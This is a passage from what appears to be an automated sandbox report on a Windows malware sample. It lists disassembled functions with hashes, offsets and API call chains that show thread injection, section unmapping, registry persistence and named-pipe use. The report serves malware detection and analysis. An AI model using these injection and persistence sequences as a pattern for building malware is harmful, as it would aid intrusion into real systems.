  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
